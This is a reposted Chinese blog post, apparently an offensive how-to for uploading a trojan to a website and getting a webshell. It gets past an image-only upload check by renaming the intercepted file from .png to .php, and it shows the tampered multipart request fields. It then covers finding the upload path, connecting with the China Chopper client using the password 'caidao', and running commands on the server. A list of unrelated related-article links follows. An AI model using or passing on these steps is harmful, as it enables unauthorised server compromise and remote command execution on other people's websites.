博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
绕过图片格式限制上传木马获取WebShell
阅读量:6652 次
发布时间:2019-06-25

本文共 791 字,大约阅读时间需要 2 分钟。

思路:

  图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php

可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示,

记录下来后用菜刀连接即可。 

(1)网站要求上传png格式的文件

(2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。

Content-Disposition: form-data; name="fun_menu_icon"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"Content-Type: image/png
-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"Content-Type: image/png

(3)在原始数据提交页面或提交数据后response页面中查找上传路径并记录。

(4)打开最新版中国菜刀,添加已经记录的路径,添加密码caidao

(5)连接虚拟终端,输入ipconfig

   

木马成功上传并执行。

转载地址:http://nnjto.baihongyu.com/

你可能感兴趣的文章
等待事件分析
查看>>
SourceTree的基本使用-git on mac
查看>>
关于构造函数
查看>>
流量压缩应用Onavo 可节约75%流量 获红杉投资
查看>>
[Note]viewstate[content]
查看>>
负载均衡技术全攻略(转载)
查看>>
MPEG2、MPEG4、H264的差异
查看>>
圣塔芭芭拉加州大学 信号压缩实验室 项目索引
查看>>
问题:Silverlight4+WCF +Windows 2008 64bit +IIs7+Db2 部署出现问题
查看>>
android 3dmax
查看>>
android 文件读取(assets)
查看>>
[Winodows Phone 7控件详解]多媒体控件
查看>>
使用【层次式】数据绑定控件
查看>>
hdfs老数据压缩备份的一些问题20120521
查看>>
sql2005中运用一条sql语句完成数据导出到Excel中
查看>>
转:vim插件 ctags 和 taglist 的安装和使用
查看>>
android 找开软件所在市场页面
查看>>
PostgreSQL的 initdb 源代码分析之十九
查看>>
Printf()输出格式控制(转)
查看>>
iOS边练边学--tableView的批量操作
查看>>